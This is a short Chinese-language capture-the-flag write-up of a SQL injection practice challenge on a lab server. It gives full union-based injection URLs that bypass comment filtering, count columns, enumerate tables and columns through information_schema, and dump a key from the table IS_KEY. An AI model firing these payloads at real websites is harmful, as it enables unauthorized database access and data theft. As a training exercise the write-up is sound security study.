练习题一 SQL注入
题目内容如下所示,需要我们通过sql注入找到key值
进入题目看到这样的页面,后面附带传参源码,注入点应该就是uid参数了。源码中可看出该题过滤掉了’–’ 和’#’
构造语句’ union select 1,2,3,4,5 or ‘1’ = ‘1猜字段数
到6的时候页面返回正常,由此可猜测字段是6,而且2和3是显示位。
构造语句显出表名
http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6 or ‘1’ = '1
然后再查看IS_KEY表中的字段http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name = ‘IS_KEY’ and table_schema=database()),3,4,5,6 or ‘1’ = '1
最后出key值http://192.168.100.150:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6’ union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 or ‘1’ = '1